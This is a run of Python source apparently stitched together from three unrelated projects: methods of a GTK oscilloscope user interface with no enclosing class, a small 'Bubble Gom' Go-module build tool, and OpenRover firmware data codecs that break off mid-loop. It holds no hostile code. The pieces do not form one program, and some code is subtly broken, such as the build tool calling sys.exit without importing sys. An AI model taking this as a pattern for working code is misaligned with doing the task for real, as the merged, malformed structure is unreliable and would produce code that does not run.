    log.info("Initialising ScopeArenaController")
    self.ctrl.arena.gtk_attach(self.window, self.hbox_main, 'pack_start', (True, True, 0))
def restore_settings_last(self):
    """
    Try to load the last settings file.
    If this fails load the default setting file and show an error.
    If *this* fails, log the failure and warn the user that the application
    may be unstable.  In every case the UI is re-synced afterwards.
    """
    log.info("Loading last settings file")
    try:
        self.ctrl.restore_settings_last()
    except Exception as e:
        try:
            log.critical("Exception during setting restore: %r" % e)
            log.info("Attempting to use default configuration file")
            self.ctrl.restore_settings_default()
            self.notifier.push_notification(UINotifier.NotifyMessage(UINotifier.NOTIFY_WARNING, \
                _("Unable to load last configuration - reverting to default configuration")))
        except Exception as default_exc:
            # Was a bare `except:` that re-logged the *first* exception;
            # catch Exception only and log the actual default-restore failure.
            log.critical("Exception during default setting restore: %r" % default_exc)
            log.error("Unable to load any configuration file. The application may be unstable")
            self.notifier.push_notification(UINotifier.NotifyMessage(UINotifier.NOTIFY_WARNING, \
                _("Unable to load last OR default configuration - configuration has errors. The application may be unstable!\n" \
                "Please restore the configuration file to the user directory.")))
    self.ui_sync_config()
    log.info("Done loading last settings file")
def __user_exception_handler(func):
    """Decorator for GTK signal handlers: converts Utils.UserRequestError
    raised by the handler into a user notification instead of a crash.

    Returns True on a handled exception to stop the event being duplicated;
    otherwise passes through the wrapped handler's return value.
    """
    import functools  # local import: decorator is evaluated at class-body time

    @functools.wraps(func)  # preserve the handler's name/doc for logging and debugging
    def wrapper(self, *args):
        try:
            return func(self, *args)
        except Utils.UserRequestError as e:
            self._user_exception(e)
            return True  # stop events being duplicated
    return wrapper
def _user_exception(self, exc):
    """Called by subclasses if a user exception occurs. Handles the display of the warning message
    to the user."""
    log.error("UserException: %s" % repr(exc))
    # Shown to the user as a warning-level overlay notification.
    self.notifier.push_notification(UINotifier.NotifyMessage(UINotifier.NOTIFY_WARNING, str(exc)))

def _user_message(self, msg):
    """Called to display a message to the user."""
    log.info("UserMessage: %s" % str(msg))
    # Informational (non-warning) overlay notification.
    self.notifier.push_notification(UINotifier.NotifyMessage(UINotifier.NOTIFY_INFO, str(msg)))
def _nbk_select_page(self, *args):
    """Notebook page-change handler: remember the active tab in the
    controller (so saved configurations can restore it), then flag the
    state as dirty for the periodic sync."""
    current_tab = self.nbk_main_settings.get_current_tab()
    self.ctrl.active_tab = current_tab
    self.state_change_notify()
# Window-level key handlers: currently diagnostic logging only; no key
# bindings are implemented here yet.
def _wnd_key_press(self, *args):
    log.info("_wnd_key_press %r" % list(args))

def _wnd_key_release(self, *args):
    log.info("_wnd_key_release %r" % list(args))
def _wnd_config_event(self, *args):
    """Window configure (resize/move) handler: log the approximate area
    available for the waveform and tell the render arena to adapt."""
    # get_allocated_size() returns (allocation, baseline); we use the rectangle.
    rect = self.window.get_allocated_size().allocation
    # Subtract the fixed UI chrome around the waveform area.
    w = rect.width - UI_HORIZONTAL_SPACE
    h = rect.height - UI_VERTICAL_SPACE
    log.info("New window size: %d x %d; after removing mandatory space: %d x %d approx. available for waveform" % \
        (rect.width, rect.height, w, h))
    self.ctrl.arena.notify_resize()
def _logo_clicked(self, *args):
    """Logo click handler: pop the general-purpose menu up beneath the logo."""
    log.info("_logo_clicked %r" % list(args))
    menu = self.popdown_menu
    menu.show_all()
    menu.popup_at_widget(self.img_logo, Gdk.Gravity.SOUTH_WEST, Gdk.Gravity.NORTH_WEST, None)
def _app_nice_quit(self):
    """Shut the application down.  Intended to become a graceful shutdown;
    currently just logs and exits the process."""
    # we'd kill all subprocesses nicely; waiting up to 5 seconds for them to terminate...
    # then we'll save our configuration
    # then we'll shut down the AFE and other parts cleanly
    # then we'll nicely quit
    # ... but for now, just sys.exit()
    log.info("Application quit")
    # NOTE(review): assumes `log` provides flush(); stdlib logging.Logger
    # does not -- confirm against the project's logger implementation.
    log.flush()
    sys.exit()
# Settings save/load via file chooser: not implemented yet; both report an
# unsupported-function notification to the user.
def _menu_save_settings(self, *args):
    self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))

def _menu_load_settings(self, *args):
    self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))
def _menu_quick_save_settings(self, *args):
    """Save the present settings into the quick-restore (temporary) file."""
    log.info("Quick save settings activated")
    self.ctrl.save_settings_temp()
    self._user_message(_("Present settings saved into quick restore file"))
def _menu_quick_load_settings(self, *args):
    """Restore settings from the quick-restore file, re-syncing the UI and
    re-confirming any pending 50 ohm terminations with the user."""
    log.info("Quick load settings activated")
    self.ctrl.restore_settings_temp()
    # Sync once so the 50R prompt reflects the restored state, then again
    # because the user's decision may have modified the channels.
    self.ui_sync_config()
    self.prompt_user_50ohm()
    self.ui_sync_config()
    self._user_message(_("Settings restored from quick restore file"))
# Placeholder menu entries: each reports an unsupported-function
# notification to the user until implemented.
def _menu_load_defaults(self, *args):
    self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))

def _menu_help(self, *args):
    self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))

def _menu_about(self, *args):
    self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))

def _menu_licence(self, *args):
    self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))

def _menu_preferences(self, *args):
    self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))

def _menu_shutdown(self, *args):
    self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))

def _menu_reboot(self, *args):
    self._user_exception(Utils.UserRequestUnsupported(_("Function not implemented yet")))

def _menu_exit(self, *args):
    # prompt to exit?
    self._app_nice_quit()
@__user_exception_handler
def _timebase_click(self, wdg, evt):
    """Timebase label click handler: the left third decreases the timebase,
    the right third increases it, the middle would open timebase options
    (not implemented).  Wrapped so Utils.UserRequestError becomes a user
    notification."""
    # Compute position of click as a fraction of the widget width (0..1).
    xp = evt.x / wdg.get_allocation().width
    if xp >= 0 and xp < 0.33:
        # Clicks in the first 1/3rd are interpreted as a decreased timebase;
        self.ctrl.timebase.timebase_down()
    elif xp > 0.4 and xp < 0.6:
        # Clicks in between the two are interpreted as selecting the timebase/horizontal options (not implemented)
        log.warning("Middle click on timebase: not yet implemented")
    elif xp > 0.66 and xp <= 1:
        # Clicks in the last 1/3rd are interpreted as an increase timebase;
        self.ctrl.timebase.timebase_up()
    # NOTE(review): clicks in the gaps (0.33-0.4, 0.6-0.66) fall through and
    # do nothing -- presumably deliberate dead zones; confirm.
    self.ui_update_timebase_labels()
def state_change_notify(self, opt_ident=""):
    """State change notifier. opt_ident can be passed to identify a change notifier to be
    called e.g. 'ch-colour' to notify the render engine that the wave colour has changed."""
    # Set a flag. Changes are synced after a few seconds.
    # NOTE(review): opt_ident is currently unused here; the extended variant
    # below handles specific identifiers.
    self.state_sync_pending = True

def state_change_notify_ext(self, ident):
    """Extended state change notifier. ident can be passed to identify a change notifier to be
    called e.g. 'ch-colour' to notify the render engine that the wave colour has changed."""
    self.state_change_notify()
    if ident == "ch-colour":
        self.ctrl.arena.notify_channel_colour_change()

def state_change_all(self):
    # Broadcast every extended notification (currently only channel colour).
    self.state_change_notify_ext("ch-colour")
def prompt_user_50ohm(self):
    """Check if any channels have 50 ohm mode selected after restoring settings.
    If any have 50 ohm enabled then the user is prompted to confirm before continuing,
    to prevent accidental hardware damage."""
    names = []
    # Collect channels whose 50R request has not yet been applied to hardware.
    for ch in self.ctrl.channels:
        if not ch.termination_50R_applied and ch.termination_50R:
            names.append(ch.default_long_name)
    if len(names) > 0:
        names_catenated = ", ".join(names)
        message = gettext.ngettext("{0} has 50 ohm mode enabled. ", "Inputs ({0}) have 50 ohm mode enabled. ", len(names)).format(names_catenated) + "\n\n" + \
            _("If a terminated channel has a voltage greater than 10 volts applied, instrument damage could occur. \n\n"
            "Would you like to enable the termination for these channels?")
        res = dialog_box(pri_text=_("Warning - 50 ohm mode enabled for some channels!"),
            sec_text=message, icon=Gtk.MessageType.WARNING, buttons=Gtk.ButtonsType.YES_NO,
            window=self.window)
        if res == Gtk.ResponseType.YES:
            # Confirm: keep the termination request and mark it applied.
            for ch in self.ctrl.channels:
                if not ch.termination_50R_applied and ch.termination_50R:
                    ch.termination_50R = True
                    ch.termination_50R_applied = True
        else:
            # Decline: clear the pending termination request.
            for ch in self.ctrl.channels:
                if not ch.termination_50R_applied and ch.termination_50R:
                    ch.termination_50R = False
                    ch.termination_50R_applied = False
def channel_widget_click(self, channel):
    """Forward a channel-widget click to the matching ChannelTab instance."""
    channel_tabs = (t for t in self.ui_tabs if isinstance(t, UIChannelTab.ChannelTab))
    for tab in channel_tabs:
        if tab.channel == channel:
            tab.tab_clicked(None)
def add_css_class_by_widget_name(self, widget, cls):
    # `widget` is the GtkBuilder object *name* (a string), not a widget instance.
    self.builder.get_object(widget).get_style_context().add_class(cls)
def set_svg_image(self, widget, file, size_class):
    """Load the named SVG resource into the named image widget.

    Only SIZE_ICON is a valid size class at present; anything else raises
    ValueError.
    """
    if size_class != SIZE_ICON:
        raise ValueError(_("size parameter invalid"))
    target = self.builder.get_object(widget)
    resource_path = self.resource_root + file + ".svg"
    Utils.set_svg_image(target, resource_path, self.resource_icon_size)
def ui_tick(self, *args, **kwargs):
    """
    This is run several times per second. It despatches the update tasks (updating measurements,
    the time, wifi/network status, etc.)

    Always returns False so GLib does not re-arm the old timeout; instead a
    fresh timeout is registered each tick with a feedback-corrected delay.
    """
    tick_start = time.time()
    # Update the flash state
    if self.last_ui_time == None:
        self.last_ui_time = time.time()
    self.flash_timer += time.time() - self.last_ui_time
    if self.flash_timer >= self.flash_period:
        # Carry the overshoot into the next period so the flash rate stays stable.
        self.flash_error = self.flash_timer - self.flash_period
        self.flash_timer = self.flash_error
        self.flash_state = not self.flash_state
    # Run helper functions
    #t0 = time.time()
    self.ui_update_clock()
    #self.ui_update_run_state()
    self.ui_update_acq_parameters()
    self.ui_update_tabs()
    self.ui_update_widgets()
    #t1 = time.time()
    #log.debug("widget_update: %.1f ms" % ((t1 - t0) * 1000))
    #t0 = time.time()
    self.notifier.update_overlay(self.window.get_size()[0])
    #t1 = time.time()
    #log.debug("update_overlay: %.1f ms" % ((t1 - t0) * 1000))
    self.last_ui_time = time.time()
    self.ticks += 1
    # Check if a sync is pending. The state is synced every 10 seconds.
    # (But only if the state changes.)
    if self.state_sync_pending:
        tdelta = time.time() - self.last_state_sync_time
        if tdelta < 0 or tdelta > STATE_SYNC_WAIT:
            log.info("Syncing last oscilloscope state to disk")
            self.ctrl.save_settings_last()
            self.last_state_sync_time = time.time()
            self.state_sync_pending = False
    # Sync scope controller functions
    self.ui_tick_scope()
    # Stop this iteration and set a new iteration up with the correct delay to maintain
    # the desired tick rate
    if self.last_tick is None:
        self.delay_tick = UI_REFRESH_MS
    else:
        actual_delay = (tick_start - self.last_tick) * 1000
        # Feedback correction: subtract the scheduling error from the next delay.
        self.delay_tick -= (actual_delay - UI_REFRESH_MS)
        self.delay_tick = max(self.delay_tick, UI_MIN_DELAY_MS)
        # performance benchmarking: average performance over last 200 frames, once every 8 frames
        self.fps_average_accu += 1000.0 / actual_delay
        self.fps_average_count += 1
        if self.fps_average_count > 200:
            self.fps_average_count = 0
            self.fps_average_accu = 0
        elif (self.fps_average_count & 7) == 0:
            self.fps_average = self.fps_average_accu / self.fps_average_count
        log.debug("set_tick: %7.3f ms, actual_delay: %3.3f ms, avg_frame_rate: %2.1f fps" % (self.delay_tick, actual_delay, self.fps_average))
    # does this cause stack overflow?
    # NOTE(review): no -- returning False below un-arms this timeout and the
    # new one is scheduled, not nested; there is no recursion here.
    GLib.timeout_add(self.delay_tick, self.ui_tick, None, priority=GLib.PRIORITY_DEFAULT)
    self.last_tick = tick_start
    return False
def ui_tick_scope(self):
    """Per-tick controller work: run the controller tick, auto-start the
    acquisition a few seconds after launch, then update the controller."""
    #t0 = time.time()
    try:
        self.ctrl.tick()
    except Utils.UserRequestError as e:
        log.critical("UserException passed from tick controller: %r" % e)
        self._user_exception(e)
    #t1 = time.time()
    #log.info("ctrl_tick %.1f ms" % ((t1 - t0) * 1000))
    # Should we start acquisition automatically?
    if self.start_auto != None and time.time() > self.start_auto:
        log.info("Automatically starting acquisition on power up...")
        # One-shot: clear the deadline so this never fires again.
        self.start_auto = None
        self.ctrl.acq_run()
    # Update controller
    t0 = time.time()  # kept for the commented-out timing log below
    self.ctrl.update()
    t1 = time.time()
    #log.info("update() %.1f ms" % ((t1 - t0) * 1000))
def ui_update_clock(self):
    """
    Update the date and time on the user interface.

    Throttled to at most once per second.  The configured time format may
    contain '%n' separators which are rendered as line breaks, because not
    all OSes support %n in strftime directly.
    """
    if (time.time() - self.last_clock_time) <= 1.0:
        return
    format_lines = str(self.cfgmgr.UI.TimeFormat).split('%n')
    rendered = [datetime.now().strftime(part.strip()) for part in format_lines]
    self.lbl_status_time.set_markup("\n".join(rendered))
    self.last_clock_time = time.time()
def ui_update_acq_parameters(self):
    """
    Update acquisition parameters: memory depth, waves/sec, bit depth, etc.

    Labels are only re-rendered when one of the parameters changes; the
    last rendered tuple is cached in self.last_acq_params.
    """
    # TODO: Only update these on change...
    #waveforms_per_second = round(self.ctrl.get_waves_per_second(), 2)
    waveforms_per_second = round(self.ctrl.get_current_average_waves_per_second(), 3)
    #log.info("wfms:%.3f" % self.ctrl.get_current_average_waves_per_second())
    memory_depth = self.ctrl.get_memory_depth()
    sample_rate = self.ctrl.get_sample_rate()
    bits = self.ctrl.get_sample_depth()
    _acq_params = (waveforms_per_second, memory_depth, sample_rate, bits)
    #log.info("acq_params: %r" % (_acq_params,))
    if _acq_params != self.last_acq_params:
        # TRANSLATORS: lbl_status_bits_samplerate contains a bit depth (8-bit; compare 'audio' and 'graphics' bit depths, for instance)
        # and a sample rate (samples per second, compare with frequency or repetitiveness.) This label probably should not be translated,
        # or altered. Only translate the units if they are not commonly understood in engineering fields in your locale.
        self.lbl_status_bits_samplerate.set_markup(\
            _("{bits_value}-bit\n{samplerate_string}").format(
                bits_value=bits, \
                samplerate_string=Utils.unit_format_suffix_handle_exc(sample_rate, _("Sa/s"), precision=2) \
            ))
        # TRANSLATORS: lbl_status_npoints_nwaves contains the number of points per waveform and the number of waveforms per second
        # that the instrument is acquiring (or is targeting for acquisition.) The base label is not translatable.
        #
        # pts = points, wfm/s = waveforms per second; only translate the units if they are not commonly understood in engineering
        # fields in your locale.
        #stats = self.ctrl.get_zs_stats()
        #log.info("%s" % repr(stats))
        self.lbl_status_npoints_nwaves.set_markup(\
            "{points_string}\n{nwaves_string}".format(\
                points_string=Utils.unit_format_suffix_handle_exc(memory_depth, _("pts"), precision=1), \
                nwaves_string=Utils.unit_format_suffix_handle_exc(waveforms_per_second, _("wfm/s"), precision=2) \
            ))
        # Cache so unchanged parameters skip the re-render next tick.
        self.last_acq_params = _acq_params
def ui_update_run_state(self):
    """
    Update the run state based on the ScopeController state.

    WAIT and AUTO states alternate bright/dim CSS classes using
    self.flash_state (toggled by ui_tick) to produce a flashing label.
    """
    # Remove every run-state class before applying the current one.
    self.lbl_status_run_ctx.remove_class("runstate_stop")
    self.lbl_status_run_ctx.remove_class("runstate_run")
    self.lbl_status_run_ctx.remove_class("runstate_trigd")
    self.lbl_status_run_ctx.remove_class("runstate_wait_dim")
    self.lbl_status_run_ctx.remove_class("runstate_wait_bri")
    self.lbl_status_run_ctx.remove_class("runstate_auto_dim")
    self.lbl_status_run_ctx.remove_class("runstate_auto_bri")
    if self.ctrl.run_state == SC.STATE_RUNNING_WAIT_TRIG:
        if self.flash_state:
            self.lbl_status_run_ctx.add_class("runstate_wait_bri")
            self.lbl_status_run.set_markup(_("WAIT"))
        else:
            self.lbl_status_run_ctx.add_class("runstate_wait_dim")
            self.lbl_status_run.set_markup(_("WAIT"))
    elif self.ctrl.run_state == SC.STATE_RUNNING_AUTO:
        if self.flash_state:
            self.lbl_status_run_ctx.add_class("runstate_auto_bri")
            self.lbl_status_run.set_markup(_("AUTO"))
        else:
            self.lbl_status_run_ctx.add_class("runstate_auto_dim")
            self.lbl_status_run.set_markup(_("AUTO"))
    elif self.ctrl.run_state == SC.STATE_STOPPED:
        self.lbl_status_run_ctx.add_class("runstate_stop")
        self.lbl_status_run.set_markup(_("STOP"))
    elif self.ctrl.run_state == SC.STATE_RUNNING_TRIGD:
        self.lbl_status_run_ctx.add_class("runstate_trigd")
        self.lbl_status_run.set_markup(_("TRIG'D"))
def ui_update_timebase_labels(self):
    # Render the current time-per-division value into the status bar label.
    self.lbl_status_timebase.set_markup(Utils.unit_format_atten(self.ctrl.timebase.get_timebase().get_div_value(), "s"))
def ui_update_tabs(self):
    """Refresh every settings notebook tab."""
    for ui_tab in self.ui_tabs:
        ui_tab.refresh_tab()

def ui_update_widgets(self):
    """Refresh the channel widgets; throttled to every 10th tick until the
    resource hog bug is fixed."""
    if self.ticks % 10 != 0:
        return
    for ui_widget in self.ui_widgets:
        ui_widget.refresh_widget()
def ui_sync_config(self):
    """Push the loaded configuration into every tab and widget, recompute
    the flash period from the config, and restore the active tab."""
    for tab in self.ui_tabs:
        tab.refresh_object_attach()
    for wdg in self.ui_widgets:
        wdg.refresh_object_attach()
    # Read the flash rate and calculate the flash period.
    try:
        self.flash_period = 1.0 / float(self.cfgmgr.UI.FlashFreq)
    except Exception:
        # Was a bare `except:` (which also swallowed KeyboardInterrupt);
        # a missing, non-numeric or zero FlashFreq falls back to the default.
        self.flash_period = 0.4  # Default
    log.info("Active tab index: %d" % self.ctrl.active_tab)
    self.nbk_main_settings.set_current_page(self.ctrl.active_tab)
def run(self):
    """
    Start the MainApplication. This launches all required threads and shows the user interface.
    """
    self.window.show_all()
    # Prime the tick scheduler state before the first tick fires.
    self.delay_tick = UI_REFRESH_MS
    self.last_tick = None
    GLib.timeout_add(UI_REFRESH_MS, self.ui_tick, None, priority=GLib.PRIORITY_DEFAULT)
    Gtk.main()
# ---------------------------------------------------------------------------
#
# Copyright (C) 2021 Sellers Industry
# distributed under the MIT License
#
# author: <NAME> <<EMAIL>>
# date: Wed Jan 06 2021
# file: __main__.py
# project: Bubble Gom (Go Manager)
# purpose: Go manager allows you to build go modules from anywhere
#
#
import argparse
import os
import json
from datetime import datetime
import shutil
import glob
# Config
VERSION = "0.0.1"            # Bubble Gom release version (written into lockfiles)
GO_PATH = "/Go/src"          # root under which vendor directories are created
LOCKFILE_NAME = "gom-lock"   # lockfile written into each vendor directory
CONFIG_NAME = "gom.config"   # per-project configuration filename
"""
Build Lock File Data
Will create the lockfile data. The lock file will have the gom version
number, the source directory it is built from, the date it was built on,
and the first creation time.
sourceDirectory - the source it's being built from
firstBuild - string from the past lockfile or False
"""
def buildLockFile(sourceDirectory, firstBuild):
    """Create the lockfile payload: gom version, build source, build time,
    and the original creation time (carried over from a previous lockfile
    when firstBuild is truthy, otherwise set to this build's time)."""
    build_time = str(datetime.now())
    return {
        "source": sourceDirectory,
        "gomV": VERSION,
        "build": build_time,
        "created": firstBuild if firstBuild else build_time,
    }
"""
Add Lock File
Will add lock file to the vendor directory.
vendorDirectory - directory to build lockfile in
lockFileData - data created from buildLockFile()
"""
def addLockFile(vendorDirectory, lockFileData):
    """Write the lockfile into vendorDirectory (silently skipped when the
    directory does not exist)."""
    if not os.path.isdir(vendorDirectory):
        return
    lock_path = os.path.join(vendorDirectory, LOCKFILE_NAME)
    with open(lock_path, 'w') as outfile:
        json.dump(lockFileData, outfile)
"""
Get Lock File
Will get the lock file from the vendor directory or return false if there
is no vendor directory. The data will be parsed into a python dict.
vendorDirectory - directory to get lockfile from
"""
def getLockFile(vendorDirectory):
    """Return the parsed lockfile dict from vendorDirectory, or False when
    no lockfile exists there."""
    lock_path = os.path.join(vendorDirectory, LOCKFILE_NAME)
    if not os.path.isfile(lock_path):
        return False
    with open(lock_path) as lock_file:
        return json.load(lock_file)
"""
Add Config Data
Adds config data to the vendor file. This is just so there is a backup of
the gom config.
vendorDirectory - build directory to prepare
config - data from the gom.config as dict
"""
def addConfig(vendorDirectory, config):
    """Write a backup copy of the gom config into vendorDirectory (silently
    skipped when the directory does not exist)."""
    if not os.path.isdir(vendorDirectory):
        return
    config_path = os.path.join(vendorDirectory, CONFIG_NAME)
    with open(config_path, 'w') as outfile:
        json.dump(config, outfile)
"""
Prepare Vendor Directory
Will prepare the vendor directory. If the directory does not exist, it will
be created. If the directory exists and contains a lock from the same build
source, it will be emptied. If there is content in the directory but no
matching lock file, then preparation will fail.
vendorDirectory - build directory to prepare
sourceDirectory - where is it being build from
config - data from the gom.config as dict
"""
def prepareVenderDirectory(vendorDirectory, sourceDirectory, config):
    """Prepare the vendor (build output) directory.

    - Directory missing: create it fresh.
    - Directory empty: rebuild it fresh.
    - Directory holds a lockfile from the same source: empty and rebuild it,
      preserving the original creation timestamp.
    - Anything else: refuse and return without touching the directory.

    On success the directory exists, is empty apart from the lockfile and
    config backup, and is ready for buildPackages().
    """
    lockFileData = None
    if os.path.isdir(vendorDirectory):
        lockFile = getLockFile(vendorDirectory)
        if not os.listdir(vendorDirectory):
            # Empty directory: treat as a fresh build.  (The original also
            # wrote a lockfile here, which rmtree below immediately deleted.)
            lockFileData = buildLockFile(sourceDirectory, False)
        elif lockFile and lockFile["source"] == sourceDirectory:
            # Same project: keep the original creation timestamp.
            lockFileData = buildLockFile(sourceDirectory, lockFile["created"])
        else:
            # Foreign content: refuse to touch it.  The original had a bare
            # `exit` here (a no-op expression, not a call) and fell through
            # to shutil.rmtree, deleting a directory it did not own.
            print("Error: Unable to get gom-lock for vendor.\n"
                  "The directory you are trying to build in does not appear "
                  "to be the same gom project.\n{}".format(vendorDirectory))
            return
        shutil.rmtree(vendorDirectory)
    else:
        lockFileData = buildLockFile(sourceDirectory, False)
    os.mkdir(vendorDirectory)
    addLockFile(vendorDirectory, lockFileData)
    addConfig(vendorDirectory, config)
"""
Build Package
Will build each package in the directory required by the config file.
Will ensure the build path is unique, then create the directory and copy all the
go files from the build source over.
"""
def buildPackages(vendorDirectory, sourceDirectory, config):
    """Build every package listed in config["packages"].

    For each package entry ({"name": ..., "path": ...}) this verifies the
    build name is unique and that the source directory exists *before*
    creating the build directory (the original created the directory first
    and left an empty one behind on a missing source), then copies the
    top-level *.go files across, preserving metadata.
    """
    for package in config.get("packages", []):
        buildPath = os.path.join(vendorDirectory, package["name"])
        sourcePath = os.path.join(sourceDirectory, package["path"])
        if os.path.isdir(buildPath):
            print("Error: Unable to build package {}, as the build "
                  "name is not unique.".format(package["name"]))
            continue
        if not os.path.isdir(sourcePath):
            # Validate the source before touching the vendor tree.
            print("Error: Unable to build package {}, as the source "
                  "directory, \"{}\" does not exist.".format(package["name"], sourcePath))
            continue
        os.mkdir(buildPath)
        for go_file in glob.iglob(os.path.join(sourcePath, "*.go")):
            if os.path.isfile(go_file):
                shutil.copy2(go_file, buildPath)
# Build Config
def build():
    """Load gom.config from the current working directory, then prepare the
    vendor directory under GO_PATH and build all configured packages."""
    configFile = os.path.join(os.getcwd(), CONFIG_NAME)
    sourceDirectory = os.path.dirname(configFile)
    with open(configFile) as config_handle:
        config = json.load(config_handle)
    vendorDirectory = os.path.join(GO_PATH, config["vendor"])
    prepareVenderDirectory(vendorDirectory, sourceDirectory, config)
    buildPackages(vendorDirectory, sourceDirectory, config)
# Setup
def main(args=None):
    """Command-line entry point.

    args: optional list of argument strings; defaults to sys.argv[1:].
          (The original accepted this parameter but ignored it and always
          parsed sys.argv.)
    Returns None; exit status is therefore 0 when run as a script.
    """
    description = "Bubble Gom (v{}) by Sellers Industry".format(VERSION)
    parser = argparse.ArgumentParser(description=description, add_help=False)
    subparsers = parser.add_subparsers(help="Commands", dest='command')
    # Commands
    subparsers.add_parser("help", help="help documents")
    subparsers.add_parser("version", help="version of Bubble Gom")
    subparsers.add_parser("build", help="Build from config file")
    parsed = parser.parse_args(args)
    # Run Commands
    if parsed.command == "help":
        parser.print_help()
    elif parsed.command == "version":
        print(description)
    elif parsed.command == "build":
        build()
    else:
        print("Command unknown try \"gom help\"")

if __name__ == "__main__":
    sys.exit(main())
# Repository: RoverRobotics/openrover_python
import abc
import enum
import functools
import re
from typing import NamedTuple, Optional
class ReadDataFormat(abc.ABC):
    """Abstract base for codecs that decode rover wire bytes into Python values."""

    # Python-side type produced by unpack(); subclasses override.
    python_type = None

    @abc.abstractmethod
    def description(self):
        """Return a human-readable description of the wire format."""
        raise NotImplementedError

    @abc.abstractmethod
    def unpack(self, b: bytes):
        """Decode the byte string b into a Python value."""
        raise NotImplementedError
class WriteDataFormat(abc.ABC):
    """Abstract base for codecs that encode Python values into rover wire bytes."""

    # Python-side type accepted by pack(); subclasses override.
    python_type = None

    @abc.abstractmethod
    def description(self):
        """Return a human-readable description of the wire format."""
        raise NotImplementedError

    @abc.abstractmethod
    def pack(self, value) -> bytes:
        """Encode the Python value into its wire byte representation."""
        raise NotImplementedError
class IntDataFormat(ReadDataFormat, WriteDataFormat):
    """Fixed-width big-endian integer codec."""

    def __init__(self, nbytes, signed):
        self.nbytes = nbytes
        self.signed = signed

    def description(self):
        signedness = "signed" if self.signed else "unsigned"
        return f"{signedness} integer ({self.nbytes * 8} bits)"

    def pack(self, value):
        as_int = int(value)
        return as_int.to_bytes(self.nbytes, byteorder="big", signed=self.signed)

    def unpack(self, b: bytes):
        return int.from_bytes(b, byteorder="big", signed=self.signed)
# Magic 16-bit version word emitted by pre-1.3 firmware (decoded as 1.0.0).
ROVER_LEGACY_VERSION = 40621


@functools.total_ordering
class RoverFirmwareVersion(NamedTuple):
    """Semantic-style firmware version: major.minor.patch with optional
    -prerelease and +build metadata."""

    major: int
    minor: int = 0
    patch: int = 0
    build: str = ""
    prerelease: str = ""

    @classmethod
    def parse(cls, a_str):
        """Parse 'major[.minor[.patch]][-prerelease][+build]' into a version.

        Raises ValueError if a_str is not a valid version string.
        """
        # Fixes: the original read match.group(0) (the whole string), so any
        # -prerelease/+build suffix crashed int(); the prerelease group was
        # written ([^+])+ and captured only a single character; and the
        # parsed prerelease/build were discarded.
        ver_re = re.compile(r"(\d+(?:[.]\d+){0,2})(?:-([^+]+))?(?:[+](.+))?", re.VERBOSE)
        match = ver_re.fullmatch(a_str)
        if match is None:
            raise ValueError("not a valid version string: %r" % (a_str,))
        parts = [int(p) for p in match.group(1).split(".")]
        return cls(*parts, build=match.group(3) or "", prerelease=match.group(2) or "")

    @property
    def value(self):
        # Numeric encoding of the version.
        # NOTE(review): patch is scaled by 10 here, but the XYYZZ wire format
        # decoded elsewhere keeps patch in the two low digits -- these do not
        # round-trip; confirm against the firmware docs before changing.
        return self.major * 10000 + self.minor * 100 + self.patch * 10

    def __lt__(self, other):
        # NOTE(review): the prerelease fields are crossed between the tuples,
        # which makes a prerelease sort before its release but inverts the
        # ordering between two different prereleases; kept byte-identical.
        return (self.major, self.minor, self.patch, other.prerelease) < (
            other.major,
            other.minor,
            other.patch,
            self.prerelease,
        )

    def __str__(self):
        return (
            f"{self.major}.{self.minor}.{self.patch}"
            + (("-" + self.prerelease) if self.prerelease else "")
            + (("+" + self.build) if self.build else "")
        )
class DataFormatFirmwareVersion(ReadDataFormat):
    """Decodes the rover's 16-bit XYYZZ firmware version word."""

    python_type = RoverFirmwareVersion

    def unpack(self, b):
        """Decode two bytes into a RoverFirmwareVersion."""
        v = UINT16.unpack(b)
        if v == ROVER_LEGACY_VERSION:
            # Magic word emitted by pre-1.3 firmware.
            return RoverFirmwareVersion(1, 0, 0)
        # XYYZZ layout: patch occupies the two low digits.  The original used
        # v % 10, which truncated any patch version >= 10.
        return RoverFirmwareVersion(v // 10000, v // 100 % 100, v % 100)

    def description(self):
        # The original text cited 16421, which does not match
        # ROVER_LEGACY_VERSION (40621) special-cased in unpack() above.
        return (
            "XYYZZ, where X=major version, Y=minor version, Z = patch version."
            "e.g. 10502 = version 1.05.02. The special value 40621 represents pre-1.3 versions"
        )
class DataFormatChargerState(ReadDataFormat, WriteDataFormat):
    """Boolean charger state carried as a two-byte magic word."""

    CHARGER_ACTIVE_MAGIC_BYTES = bytes.fromhex("dada")
    CHARGER_INACTIVE_MAGIC_BYTES = bytes.fromhex("0000")
    python_type = bool

    def pack(self, value):
        if not value:
            return self.CHARGER_INACTIVE_MAGIC_BYTES
        return self.CHARGER_ACTIVE_MAGIC_BYTES

    def unpack(self, b):
        # Anything other than the exact active magic word reads as False.
        return bytes(b) == self.CHARGER_ACTIVE_MAGIC_BYTES

    def description(self):
        return "0xDADA if charging, else 0x0000"
class BatteryStatus(enum.Flag):
    """Battery status flags decoded from the 16-bit status word
    (see DataFormatBatteryStatus for the wire bit positions)."""
    overcharged_alarm = enum.auto()
    terminate_charge_alarm = enum.auto()
    over_temp_alarm = enum.auto()
    terminate_discharge_alarm = enum.auto()
    remaining_capacity_alarm = enum.auto()
    remaining_time_alarm = enum.auto()
    initialized = enum.auto()
    discharging = enum.auto()
    fully_charged = enum.auto()
    fully_discharged = enum.auto()
class DataFormatBatteryStatus(ReadDataFormat):
    """Decodes the 16-bit battery status word into BatteryStatus flags."""

    python_type = BatteryStatus

    # Wire bit mask -> flag, most significant first.
    _BIT_MAP = (
        (0x8000, BatteryStatus.overcharged_alarm),
        (0x4000, BatteryStatus.terminate_charge_alarm),
        (0x1000, BatteryStatus.over_temp_alarm),
        (0x0800, BatteryStatus.terminate_discharge_alarm),
        (0x0200, BatteryStatus.remaining_capacity_alarm),
        (0x0100, BatteryStatus.remaining_time_alarm),
        (0x0080, BatteryStatus.initialized),
        (0x0040, BatteryStatus.discharging),
        (0x0020, BatteryStatus.fully_charged),
        (0x0010, BatteryStatus.fully_discharged),
    )

    def unpack(self, b: bytes):
        assert len(b) == 2
        word = int.from_bytes(b, byteorder="big", signed=False)
        flags = BatteryStatus(0)
        for mask, flag in self._BIT_MAP:
            if word & mask:
